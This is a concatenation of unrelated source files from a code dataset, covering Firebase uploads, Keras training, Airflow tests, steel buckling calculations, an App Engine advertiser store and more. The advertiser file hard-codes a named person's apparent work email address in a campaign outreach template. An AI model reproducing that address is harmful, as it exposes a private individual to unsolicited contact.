firebase.FirebaseApplication(db_url, None)\n\n\t\t# clear the online data before re-uploading to Firebase\n\t\tfdb.delete('/STOCK_S10', None)\n\n\t\tif na_flag == False:\n\t\t\t# push each selected row to Firebase\n\t\t\tfor row in row_ls:\n\t\t\t\tfdb.post('/STOCK_S10', row)\n\n\t\t\tprint('上傳STOCK_S10成功.')\n\t\telse:\n\t\t\tprint('今日無符合條件之股票,不做資料上傳.')\n\n\texcept Exception as e:\n\t\tprint('Err: 資料上傳Firebase table => STOCK_S10異常.')\n\t\tprint(e.args)\n\t\treturn\n\n\tprint(\"End of prog.\\n\\n\")\n\nif __name__ == '__main__':\n\tMAIN_STOCK_SELECT_TYPE10_FB()\t","sub_path":"STOCK_SELECT_TYPE10_FB.py","file_name":"STOCK_SELECT_TYPE10_FB.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"514997329","text":"import os.path\nimport asyncio\n\nasync def process(root,tfile):\n try:\n fullpath = os.path.join(root,tfile)\n for line in open(fullpath):\n if \"{% extends\" in line:\n match = line[line.find(\"{% extends \\\"\"):\n line.find(\"\\\" %}\")]\n match2 = match.replace(\"{% extends \\\"\", \"\")\n print('{} <-- {}'.format(match2,fullpath))\n except UnicodeDecodeError:\n pass\n\n\nasync def traverse(targetpath):\n \"\"\"Visit all folders in the directory, looking up extend and import tags.\"\"\"\n tasks = []\n for root, dirs, files in os.walk(targetpath, topdown=False):\n for tfile in files:\n task = asyncio.ensure_future(process(root,tfile))\n tasks.append(task)\n await asyncio.gather(*tasks, 
return_exceptions=False)\n","sub_path":"traverse.py","file_name":"traverse.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"545343442","text":"import logging\n\nfrom google.appengine.ext import ndb\n\nimport models\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_advertisers(keys=None):\n\n if keys is None:\n advertisers = list(models.Advertiser.query())\n else:\n if isinstance(keys, ndb.Key):\n advertisers = keys.get()\n else:\n advertisers = ndb.get_multi(keys)\n\n return advertisers\n\n\ndef create_blank_advertisee():\n\n advertisee = models.Advertisee()\n\n return advertisee\n\n\ndef create_blank_advertiser():\n\n advertisee = models.Advertiser()\n\n return advertisee\n\n\ndef get_advertisees():\n\n advertisers = list(models.Advertisee.query())\n\n return advertisers\n\n\ndef get_advertisee(id_):\n\n a = models.Advertisee.get_by_id(id_)\n\n return a\n\n\ndef get_advertiser(id_):\n\n a = models.Advertiser.get_by_id(id_)\n\n return a\n\n\ndef get_poc(id_):\n\n print(len(id_))\n poc = models.POC.get_by_id(id_)\n\n return poc\n\n\ndef create_poc():\n\n poc = models.POC()\n\n return poc\n\n\ndef put(models):\n\n if isinstance(models, ndb.Model):\n return models.put()\n else:\n return ndb.put_multi(models)\n\n\ndef get(specifiers, kind=None):\n\n if not isinstance(specifiers, (tuple, list)):\n if kind:\n specifiers = ndb.Key(kind, specifiers)\n return specifiers.get()\n\n if kind:\n specifiers = [ndb.Key(kind, x) for x in specifiers]\n\n return ndb.get_multi(specifiers)\n\n\ndef delete(specifiers, kind=None):\n\n if not isinstance(specifiers, (tuple, list)):\n specifiers = [specifiers]\n\n if kind:\n specifiers = [ndb.Key(kind, x) for x in specifiers]\n\n ndb.delete_multi(specifiers)\n\n\ndef remove_advertiser(advertisee_id, advertiser_id):\n\n a = get_advertisee(advertisee_id)\n\n k = ndb.Key(models.Advertiser, advertiser_id)\n\n a.advertisers.remove(k)\n\n a.put()\n\n\ndef add_advertiser(advertisee_id, advertiser_id):\n\n a = get_advertisee(advertisee_id)\n\n k = ndb.Key(models.Advertiser, advertiser_id)\n\n a.advertisers.append(k)\n\n a.put()\n\n\ndef delete_advertisee(id_):\n\n if id_ is not None:\n ndb.Key(models.Advertisee, id_).delete()\n\n\ndef delete_advertiser(id_):\n\n if id_ is not None:\n advertiser = get_advertiser(id_)\n to_delete = advertiser.pocs\n to_delete.append(advertiser.key)\n ndb.delete_multi(to_delete)\n\n to_put = []\n for advertisee in get_advertisees():\n try:\n advertisee.advertisers.remove(advertiser.key)\n except ValueError:\n pass\n else:\n to_put.append(advertisee)\n\n ndb.put_multi(to_put)\n\n\ndef insert_advertisexs():\n\n email_template_breitbart = \"\"\"\n Hey %s,\n\n I'm getting in touch with you as part of the Sleeping Giants campaign. Did you know that %s has ads appearing on Breitbart.com?\n Breitbart is widely known as a hate speech site, regularly distributing anti-Semitic, anti-Muslim, xenophobic and misogynist propaganda - and it's being propped up by ad revenues sent from companies like yours via 3rd party ad platforms.\n\n Is this something you support?\n\n If not, you can change this by contacting your ad agency and asking them to exclude Breitbart from your media buy.\n Will you please consider joining 700+ companies who have already blacklisted Breitbart? Please let me know. 
We would love to add you to the confirmed list!\n\n I hope to see the advertisements taken down,\n Sal\n \"\"\"\n\n breitbart_key = models.Advertisee(name='Breitbart', description='Hateful website with neonazi leader.', email=email_template_breitbart).put()\n poc_kayak_key = models.POC(name='Stephanie', email='sretcho@kayak.com').put()\n kayak_key = models.Advertiser(name='Kayak', pocs=[poc_kayak_key]).put()\n breitbart = breitbart_key.get()\n breitbart.advertisers.append(kayak_key)\n breitbart.put()\n\n\ndef insert_advertiser():\n\n poc_uber_key = models.POC(name='Alex', email='alex@gmail.com').put()\n models.Advertiser(name='Uber', pocs=[poc_uber_key]).put()\n","sub_path":"shared/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"137611182","text":"import json\nimport msal\n\n# This code based on Microsoft sample at https://github.com/AzureAD/microsoft-authentication-library-for-python/blob/dev/sample/confidential_client_secret_sample.py\n\n# Load settings from disk\noauth_settings = json.load(open('settings.json'))['Microsoft']\n\n# Create a preferably long-lived app instance which maintains a token cache.\napp = msal.ConfidentialClientApplication(\n oauth_settings['application_id'], authority=oauth_settings['authority'],\n client_credential=oauth_settings['secret'],\n)\n\n\ndef get_auth_header():\n \"\"\"Returns token ready for use as 'Authorization' header. Checks memory cache before fetching a new token.\"\"\"\n result = None\n\n # Check in-memory cache for existing token\n # Since we are looking for token for the current app, NOT for an end user,\n # we give account parameter as None.\n result = app.acquire_token_silent(oauth_settings['scope'], account=None)\n\n # If no token in cache, get a new one\n if not result:\n result = app.acquire_token_for_client(scopes=oauth_settings['scope'])\n\n if \"access_token\" in result:\n return result['token_type'] + ' ' + result['access_token']\n else:\n raise RuntimeError(\"Failed to get an authorization token.\", result.get(\n \"error\"), result.get(\"error_description\"), result.get(\"correlation_id\"))\n","sub_path":"graph_auth_helper.py","file_name":"graph_auth_helper.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"54582350","text":"from __future__ import print_function\nfrom keras.applications.resnet50 import ResNet50, preprocess_input\nfrom keras.layers import Input, AveragePooling2D\nfrom keras.models import Model\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nimport h5py\nimport matplotlib.pyplot as plt\nimport pickle\nimport keras\nimport numpy as np\nfrom keras import optimizers\nimport sklearn.metrics as sklm\nimport tensorflow as tf\nimport keras.backend as K\nimport os\nfrom keras.utils.np_utils import to_categorical\n\n# Get number of classes\nls1=os.listdir('color')\nif '.DS_Store' in ls1:\n ls1.remove('.DS_Store')\ndic1={}\nfor idx,i in enumerate(ls1):\n dic1[i]=idx\n print(i)\n\n#F1 through callback\nclass Metrics(keras.callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.confusion = []\n self.precision = []\n self.recall = []\n self.f1s = []\n\n def on_epoch_end(self, epoch, logs={}):\n score = np.asarray(self.model.predict(self.validation_data[0]))\n predict = np.round(np.asarray(self.model.predict(self.validation_data[0])))\n targ = self.validation_data[1]\n\n 
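# log micro-averaged F1 and a confusion matrix over argmax class labels once per epoch\n 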
self.f1s.append(sklm.f1_score(targ, predict,average='micro'))\n self.confusion.append(sklm.confusion_matrix(targ.argmax(axis=1),predict.argmax(axis=1)))\n\n return\n\n# Loading saved predicted X and y\ndef load_bottleneck_data(training_file, validation_file):\n\n h5f = h5py.File('bftx_resnet.h5', 'r')\n X_train2 = h5f['bftx'][:]\n h5f.close()\n h5f = h5py.File('bfvx_resnet.h5', 'r')\n X_val2 = h5f['bfvx'][:]\n h5f.close()\n with open('bfty_resnet.pkl', 'rb') as f:\n y_train2 = pickle.load(f)\n with open('bfvy_resnet.pkl', 'rb') as f:\n y_val2 = pickle.load(f)\n\n return X_train2, y_train2, X_val2, y_val2\n\n# Calling the above function to load saved data\nX_train, y_train, X_val, y_val = load_bottleneck_data('resnet_train_bottleneck.json',\n 'resnet_validate_bottleneck.json')\nnum_classes = len(dic1)\ny_train = to_categorical(y_train, num_classes=num_classes)\ny_val = to_categorical(y_val,num_classes = num_classes)\n\n# input image dimensions\nimg_rows, img_cols = 256, 256\nh = 256\nw = 256\nch = 3\n\n#HYPERPARAMETERS\nbatch_size = 128\nnum_classes = len(dic1)\nepochs = 20\nprint(num_classes)\n#Model\ndef create_model_resnet():\n\n input_tensor = Input(shape=(h, w, ch))\n model = ResNet50(input_tensor=input_tensor, include_top=False, input_shape=(256,256,3))\n # x = model.output\n # x = Dropout()(x)\n # model = Model(model.input,x)\n return model\n\n#Adding final layer\nprint(X_train.shape)\ninput_shape = X_train.shape[1:]\ninp = Input(shape=input_shape)\nx = Flatten()(inp)\nx = Dense(num_classes, activation='softmax')(x)\nmodel = Model(inp, x)\n\nsgd = optimizers.SGD(lr=0.0007, decay=1e-6, momentum=0.9, nesterov=True)\nmodel.compile(optimizer= sgd, loss='categorical_crossentropy', metrics=['accuracy'])\n\nmetrics = Metrics()\n\n\nwith tf.Session() as sess:\n # fetch session so Keras API can work\n K.set_session(sess)\n K.set_learning_phase(1)\n history =model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size,\n validation_data=(X_val, y_val), shuffle=True, verbose=1,callbacks=[metrics] )\n print(metrics.f1s)\n\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n print(history.history['acc'])\n # f1_mean = history.history['f1']\n # val_f1 = history.history['val_f1']\n\n # summarize history for accuracy\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train ' + str(acc[-1]), 'test ' + str(val_acc[-1])], loc='upper left')\n plt.show()\n\n # summarize history for loss\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train ' + str(loss[-1]), 'test ' + str(val_loss[-1])], loc='upper left')\n plt.show()\n\n # # summarize history for f1\n plt.plot(metrics.f1s)\n # plt.plot(history.history['val_f1'])\n plt.title('f1 mean score')\n plt.ylabel('f1')\n plt.xlabel('epoch')\n plt.legend(['val ' + str(metrics.f1s[-1])], loc='upper left')\n plt.show()\n\n print(metrics.confusion[-1])\n\n ans = input(\"Do you want to save the weights?\")\n if ans == 'y':\n model.save_weights('resnet_grapes_bottleneck_weights_temp.h5')\n print(\"Saved\")\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print(dir_path)\nprint(\"Reach End 
\\n\")","sub_path":"model1_final.py","file_name":"model1_final.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"32443217","text":"from subprocess import Popen, PIPE\nfrom plyer.facades import UniqueID\nfrom plyer.utils import whereis_exe\n\nfrom os import environ\n\n\nclass FreeBSDUniqueID(UniqueID):\n def _get_uid(self):\n old_lang = environ.get('LANG')\n environ['LANG'] = 'C'\n dmidecode_process = Popen([\"dmidecode\", \"-quiet\"], stdout=PIPE, stderr=PIPE)\n grep_process = Popen([\"grep\", \"-m1\", \"serial:\"],\n stdin=dmidecode_process.stdout, stdout=PIPE)\n dmidecode_process.stdout.close()\n output = grep_process.communicate()[0]\n environ['LANG'] = old_lang\n\n if output:\n return output.split()[1]\n else:\n return None\n\n\ndef instance():\n import sys\n if whereis_exe('dmidecode'):\n return FreeBSDUniqueID()\n sys.stderr.write(\"dmidecode not found.\")\n return UniqueID()\n","sub_path":"plyer/platforms/freebsd/uniqueid.py","file_name":"uniqueid.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"68070106","text":"from ocdsextensionregistry import Extension\n\n\ndef test_init():\n args = arguments(Core='true')\n obj = Extension(args)\n\n assert obj.id == args['Id']\n assert obj.category == args['Category']\n assert obj.core is True\n\n\ndef test_repr():\n obj = Extension(arguments(Core='true'))\n\n assert repr(obj) == 'location'\n\n\ndef test_init_non_core():\n for core in ('TRUE', 'True', 'false', 'foo', '', None):\n obj = Extension(arguments(Core=core))\n\n assert obj.core is False\n\n\ndef test_as_dict():\n args = arguments(Core='')\n obj = Extension(args)\n\n assert obj.as_dict() == {\n 'id': args['Id'],\n 'category': args['Category'],\n 'core': False,\n }\n\n\ndef arguments(**kwargs):\n data = {\n 'Id': 'location',\n 'Category': 'item',\n }\n\n data.update(kwargs)\n return data\n","sub_path":"tests/test_extension.py","file_name":"test_extension.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"617439871","text":"age = int(input())\ntempsPermis = int(input())\nnbAccident = int(input())\nnbClients = int(input())\n\ntarif = [\"rouge\",\"orange\",\"vert\",\"bleu\"]\nclient = 0\n\nif (nbAccident >= 2):\n client = \"REFUSE\"\nelif (nbAccident == 0):\n if (age >= 25):\n if (tempsPermis >= 2):\n client = 2\n else:\n client = 1\n #endif*\n else:\n client = 0\nelif (nbAccident == 1):\n if (age < 25):\n client = 0\n else:\n client = 1\nelse:\n client = 0\n\nif (nbClients >= 5):\n client += 1;\n\nprint(tarif.pop(client))","sub_path":"Cnam-Algo/Algo Simple/6.2.py","file_name":"6.2.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"127986335","text":"import numpy as np\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.initialized = False\n self.val = None\n self.avg = None\n self.sum = None\n self.count = None\n\n def initialize(self, val, weight):\n self.val = val\n self.avg = val\n self.sum = val*weight\n self.count = weight\n self.initialized = True\n\n def update(self, val, weight=1):\n val = np.asarray(val)\n if not self.initialized:\n self.initialize(val, weight)\n else:\n self.add(val, weight)\n\n def add(self, val, 
weight):\n self.val = val\n self.sum += val * weight\n self.count += weight\n self.avg = self.sum / self.count\n\n def value(self):\n return self.val.tolist()\n\n def average(self):\n return self.avg.tolist()\n\n\ndef unique(ar, return_index=False, return_inverse=False, return_counts=False):\n ar = np.asanyarray(ar).flatten()\n\n optional_indices = return_index or return_inverse\n optional_returns = optional_indices or return_counts\n\n if ar.size == 0:\n if not optional_returns:\n ret = ar\n else:\n ret = (ar,)\n if return_index:\n ret += (np.empty(0, np.bool),)\n if return_inverse:\n ret += (np.empty(0, np.bool),)\n if return_counts:\n ret += (np.empty(0, np.intp),)\n return ret\n if optional_indices:\n perm = ar.argsort(kind='mergesort' if return_index else 'quicksort')\n aux = ar[perm]\n else:\n ar.sort()\n aux = ar\n flag = np.concatenate(([True], aux[1:] != aux[:-1]))\n\n if not optional_returns:\n ret = aux[flag]\n else:\n ret = (aux[flag],)\n if return_index:\n ret += (perm[flag],)\n if return_inverse:\n iflag = np.cumsum(flag) - 1\n inv_idx = np.empty(ar.shape, dtype=np.intp)\n inv_idx[perm] = iflag\n ret += (inv_idx,)\n if return_counts:\n idx = np.concatenate(np.nonzero(flag) + ([ar.size],))\n ret += (np.diff(idx),)\n return ret\n\n\ndef colorEncode(labelmap, colors):\n labelmap = labelmap.astype('int')\n labelmap_rgb = np.zeros((labelmap.shape[0], labelmap.shape[1], 3),\n dtype=np.uint8)\n for label in unique(labelmap):\n if label == 0:\n continue\n labelmap_rgb += (labelmap == label)[:, :, np.newaxis] * \\\n np.tile(colors[label-1],\n (labelmap.shape[0], labelmap.shape[1], 1))\n return labelmap_rgb\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"12200042","text":"# -*- coding: utf-8 -*-\n\"\"\"Resistance to lateral-torsional buckling\n\nThis module implements the calculation principles for structural steel in the fire situation set out in EC 3,\nPart 1-2. More detailed instruction can be found in Franssen, J.-M. & Vila Real, P. (2010) - Design of Steel Structures, with which\nthe code in this module complies. Section 5.4 is particularly followed.\n\"\"\"\nimport numpy as np\nfrom project.dat.steel_carbon import thermal\n\n\ndef _M_cr(C_1, C_2, I_z, k_z, k_w, I_w, I_t, L, E, G, z_g):\n \"\"\"\n [Eq. 5.59]\n :param C_1: Constant, found in Table 5.4 or ECCS (2006)\n :param C_2: ECCS (2006) or in Galea Y (2002)\n :param I_z: Second moment of area about the minor axis\n :param k_z: 0.5 for full restraint, 0.7 for one end fixed and one pinned, 1.0 for both pinned\n :param k_w: 0.5 for full restraint, 0.7 for one end fixed and one pinned, 1.0 for both pinned\n :param I_w: Warping constant\n :param I_t: Torsion constant\n :param L: Beam/column length\n :param E: Steel Young's modulus\n :param G: Steel shear modulus\n :param z_g: Factor governed by the load location on the section, see Fig. 5.24\n :return M_cr: The elastic critical moment for a uniform moment\n \"\"\"\n a = C_1 * (np.pi**2 * E * I_z) / (k_z * L)**2\n b = (k_z / k_w)**2 * (I_w / I_z)\n c = (k_z * L)**2 * G * I_t / np.pi**2 / E / I_z\n d = (C_2 * z_g) ** 2\n e = C_2 * z_g\n\n M_cr = a * ((b+c+d)**0.5 - e)\n\n return M_cr\n\n\ndef _lambda_LT(W_pl_y, f_y, M_cr):\n \"\"\"\n [Eq. 5.66]\n :param W_pl_y: Plastic section modulus\n :param f_y: Yield strength\n :param M_cr: Critical bending moment, see [Eq. 5.59]\n :return lambda_LT: Non-dimensional slenderness at normal temperature\n \"\"\"\n\n lambda_LT = (W_pl_y * f_y / M_cr)**0.5\n\n return lambda_LT\n\n\ndef _lambda_LT_theta_com(lambda_LT, k_y_theta_com, k_E_theta_com):\n \"\"\"\n [Eq. 5.65]\n :param lambda_LT: Non-dimensional slenderness at normal temperature\n :param k_y_theta_com: Reduction factor for the yield strength at the maximum steel temp. in the com. flange\n :param k_E_theta_com: Reduction factor for Young's modulus at the maximum steel temp. in the com. flange\n :return lambda_LT_theta_com: Non-dimensional slenderness at elevated temperature\n \"\"\"\n lambda_LT_theta_com = lambda_LT * (k_y_theta_com / k_E_theta_com)**0.5\n\n return lambda_LT_theta_com\n\ndef _alpha(f_y):\n \"\"\"\n [Eq. 5.64]\n :param f_y: Steel yield strength\n :return alpha: The imperfection factor\n \"\"\"\n\n alpha = 0.65 * (235/f_y) ** 0.5\n\n return alpha\n\ndef _phi_LT_theta_com(alpha, lambda_LT_theta_com):\n \"\"\"\n [Eq. 5.63]\n :param alpha: The imperfection factor\n :param lambda_LT_theta_com: Non-dimensional slenderness at elevated temperature\n :return phi_LT_theta_com: A variable used in [Eq. 5.62]\n \"\"\"\n\n phi_LT_theta_com = 0.5 * (1 + alpha * lambda_LT_theta_com + lambda_LT_theta_com**2)\n\n return phi_LT_theta_com\n\n\ndef _chi_LT_fi(phi_LT_theta_com, lambda_LT_theta_com):\n \"\"\"\n [Eq. 5.62]\n :param phi_LT_theta_com: Refer to [5.63]\n :param lambda_LT_theta_com: Non-dimensional slenderness at elevated temperature\n :return chi_LT_fi: Reduction factor for lateral-torsion buckling in the fire design situation\n \"\"\"\n\n chi_LT_fi = 1 / (phi_LT_theta_com + (phi_LT_theta_com**2 - lambda_LT_theta_com**2)**0.5)\n\n return chi_LT_fi\n\ndef _M_b_fi_t_Rd(chi_LT_fi, W_y, k_y_theta_com, f_y, gamma_M_fi):\n \"\"\"\n [Eq. 5.61]\n :param chi_LT_fi: Reduction factor for lateral-torsion buckling in the fire design situation\n :param W_y: Sectional modulus (plastic for class 1 steel)\n :param k_y_theta_com: Reduction factor for yield strength at elevated temperature\n :param f_y: Steel yield strength\n :param gamma_M_fi: Partial safety factor\n :return M_b_fi_t_Rd: The resistant lateral torsion bending moment\n \"\"\"\n\n M_b_fi_t_Rd = chi_LT_fi * W_y * k_y_theta_com * f_y / gamma_M_fi\n\n return M_b_fi_t_Rd\n\n\nif __name__ == \"__main__\":\n # REQUIRED PARAMETERS\n C_1 = 1.77\n C_2 = 0.\n I_z = 11400.e-8 # m4\n\n k_z = 1. # conservative\n k_w = 1. 
# conservative\n I_w = 19.3e-6 # m6\n I_t = 514.e-8 # m4\n L = 2.5 # m\n E = 210e9 # Pa\n G = 81e9 # Pa\n z_g = 0.\n theta = 273.15 + 20 # K\n theta = np.arange(0, 550, 50) + 273.15\n\n W_py_y = 7980e-6 # m3\n W_y = W_py_y\n f_y = 345e6 # Pa\n\n gamma_M_fi = 1\n\n # Calculate: The strength reduction factor for steel in fire condition\n k_y_theta_com = thermal(\"reduction factor for effective yield strength\")(theta)\n k_E_theta_com = thermal(\"reduction factor for the slope of the linear elastic range\")(theta)\n\n # Calculate: The critical bending moment resistance\n M_cr = _M_cr(C_1, C_2, I_z, k_z, k_w, I_w, I_t, L, E, G, z_g)\n\n # Calculate: The non-dimensional slenderness at normal temperature\n lambda_LT = _lambda_LT(W_py_y, f_y, M_cr)\n\n # Calculate: The non-dimensional slenderness at elevated temperature\n lambda_LT_theta_com =_lambda_LT_theta_com(lambda_LT, k_y_theta_com, k_E_theta_com)\n\n # Calculate: The imperfection factor for material\n alpha = _alpha(f_y)\n\n # Calculate: A variable used for later\n phi_LT_theta_com = _phi_LT_theta_com(alpha, lambda_LT_theta_com)\n\n # Calculate: The reduction factor for lateral torsion in fire condition\n chi_LT_fi = _chi_LT_fi(phi_LT_theta_com, lambda_LT_theta_com)\n\n # Calculate: The lateral torsion buckling moment resistance in fire condition\n M_b_fi_t_Rd = _M_b_fi_t_Rd(chi_LT_fi, W_y, k_y_theta_com, f_y, gamma_M_fi)\n\n # OUTPUTS\n print(\"The elastic resistance moment for lateral torsion is: {:.2f} MN m.\".format(M_cr * 1e-6))\n print(\"The design lateral-torsional buckling resistance moment is: {:.2f} MN m.\".format(M_b_fi_t_Rd * 1e-6))\n","sub_path":"project/func/structural_steel.py","file_name":"structural_steel.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"214077341","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\nfrom __future__ import annotations\n\nfrom unittest.mock import patch\n\nfrom airflow.models import DAG, DagRun, TaskInstance\nfrom airflow.providers.papermill.operators.papermill import PapermillOperator\nfrom airflow.utils import timezone\n\nDEFAULT_DATE = timezone.datetime(2021, 1, 1)\n\n\nclass TestPapermillOperator:\n @patch(\"airflow.providers.papermill.operators.papermill.pm\")\n def test_execute(self, mock_papermill):\n in_nb = \"/tmp/does_not_exist\"\n out_nb = \"/tmp/will_not_exist\"\n kernel_name = \"python3\"\n language_name = \"python\"\n parameters = {\"msg\": \"hello_world\", \"train\": 1}\n\n op = PapermillOperator(\n input_nb=in_nb,\n output_nb=out_nb,\n parameters=parameters,\n task_id=\"papermill_operator_test\",\n kernel_name=kernel_name,\n language_name=language_name,\n dag=None,\n )\n\n op.execute(context={})\n\n mock_papermill.execute_notebook.assert_called_once_with(\n in_nb,\n out_nb,\n parameters=parameters,\n kernel_name=kernel_name,\n language=language_name,\n progress_bar=False,\n report_mode=True,\n )\n\n def test_render_template(self):\n args = {\"owner\": \"airflow\", \"start_date\": DEFAULT_DATE}\n dag = DAG(\"test_render_template\", default_args=args)\n\n operator = PapermillOperator(\n task_id=\"render_dag_test\",\n input_nb=\"/tmp/{{ dag.dag_id }}.ipynb\",\n output_nb=\"/tmp/out-{{ dag.dag_id }}.ipynb\",\n parameters={\"msgs\": \"dag id is {{ dag.dag_id }}!\"},\n kernel_name=\"python3\",\n language_name=\"python\",\n dag=dag,\n )\n\n ti = TaskInstance(operator, run_id=\"papermill_test\")\n ti.dag_run = DagRun(execution_date=DEFAULT_DATE)\n ti.render_templates()\n\n assert \"/tmp/test_render_template.ipynb\" == operator.input_nb\n assert \"/tmp/out-test_render_template.ipynb\" == operator.output_nb\n assert {\"msgs\": \"dag id is test_render_template!\"} == operator.parameters\n assert \"python3\" == operator.kernel_name\n assert \"python\" == operator.language_name\n","sub_path":"tests/providers/papermill/operators/test_papermill.py","file_name":"test_papermill.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"355376446","text":"import pandas as pd\nimport functions as f\n\neNO = f.readExcelFromFolder('excel', 'ExpensesNonOrder')\nsupplierOrder = f.readExcelFromFolder('excel', 'SupplierOrder')\ninv = f.readExcelFromFolder('excel', 'Invoice')\norder = f.readExcelFromFolder('excel', 'Order')\nBookOrder = f.readExcelFromFolder('excel', 'BookOrder')\nBooks = f.readExcelFromFolder('excel', 'Books')\n\n\nBooks = Books.filter(['book_ID', 'book_salesPrice']).rename(columns={\"book_ID\": \"id\", \"book_salesPrice\": \"price\"}, inplace=False)\nBookOrder = BookOrder.rename(columns={\"bookOrder_bookID\": \"id\", \"bookOrder_quantity\": \"quantity\"}, inplace=False).merge(Books, on = 'id').rename(columns={'bookOrder_orderID':'orderID'}, inplace=False)\n\n\nBookOrder = BookOrder.merge(order.filter(['order_ID', 'order_date']).rename(columns={'order_ID':'orderID', 'order_date':'date'}, inplace=False), on='orderID')\nBookOrder[['quantity', 'price']] = BookOrder[['quantity', 'price']].astype(float)\nBookOrder['bookOrder_total'] = BookOrder['quantity'] * BookOrder['price']\n\neNO = eNO.rename(columns={'exp_invoiceID':'invID'}, inplace=False)\neNO[['exp_date']] = eNO[['exp_date']].astype('datetime64')\neNOInv = eNO.merge(inv.rename(columns={'invoice_ID':'invID', 
'invoice_amount':'invTotal'}, inplace=False), on = 'invID')\neNOInv = eNOInv.rename(columns={'exp_date':'date'}, inplace=False)\n\n\nsupplierOrder = supplierOrder.rename(columns={'sO_bookID':'id', 'sO_datetime': 'date'}, inplace=False)#['date'].astype('datetime64')\nsupplierOrder[['date']] = supplierOrder[['date']].astype('datetime64')\nsupplierOrder = supplierOrder.merge(Books, on = 'id')\nsupplierOrder['sO_total'] = (supplierOrder['sO_bookAmount'] * supplierOrder['price']).abs()*-1\n\n\n\ndays = pd.date_range(order['order_date'].min(), order['order_date'].max(), freq='D')\nmergeFrame = days.to_frame(index=False)\nmergeFrame = mergeFrame.rename(columns={0:'date'}, inplace=False)\n\n\n\nmergeFrame = mergeFrame.merge(supplierOrder, on='date', how='outer')\nmergeFrame = mergeFrame.merge(eNOInv, on='date', how='outer')\nmergeFrame = mergeFrame.merge(BookOrder, on='date', how='outer')\nmergeFrame = mergeFrame.filter(['date', 'sO_total', 'invTotal', 'bookOrder_total'])","sub_path":"revenueAndExpensesFeeder.py","file_name":"revenueAndExpensesFeeder.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"372779420","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 7)\n\nC = []\n\nH, W = map(int, input().split())\nfor i in range(H):\n l_str = list(input().strip())\n C.append(l_str)\n\ndef gcd(a, b):\n while b != 0:\n a, b = b, a%b\n return a\n\ndef size(x, y):\n k = 1\n l = 1\n while(C[y][x+k] == \"o\"):\n k += 1\n while(C[y+l][x] == \"o\"):\n l += 1\n g = gcd(k, l)\n return g, k//g, l//g\n\ndef abc(size, x, y, cx, cy):\n corner = [[4, 5], [5, 4], [1, 3]]\n if [x, y] in corner or ([x, y] == [3, 1] and C[cy+size][cx-size] == \".\"):\n bx = max(0, cx - 1*size)\n bx2 = min(W, cx + 5*size)\n else:\n bx = max(0, cx - 2*size)\n bx2 = min(W, cx + 4*size)\n by = min(H, cy + 5*size)\n count = 0\n for i in range(cy, by):\n for j in range(bx, bx2):\n if C[i][j] == \"o\":\n C[i][j] = \".\"\n count += 1\n d = count // (size**2)\n\n if d == 12:\n ans[0] += 1\n elif d == 16:\n ans[1] += 1\n elif d == 11:\n ans[2] += 1\n else:\n ans[3] += 1\n\n\nans = [0, 0, 0, 0]\nfor i in range(H):\n for j in range(W):\n if C[i][j] == \"o\":\n s, x, y = size(j, i)\n abc(s, x, y, j, i)\n\nprint(ans[0], ans[1], ans[2])\n","sub_path":"ARC/ARC005/D_2.py","file_name":"D_2.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"291538522","text":"from QSP400 import dataPro as data\nimport numpy as np\nfrom keras import optimizers\nfrom keras.models import model_from_yaml\nimport pandas as 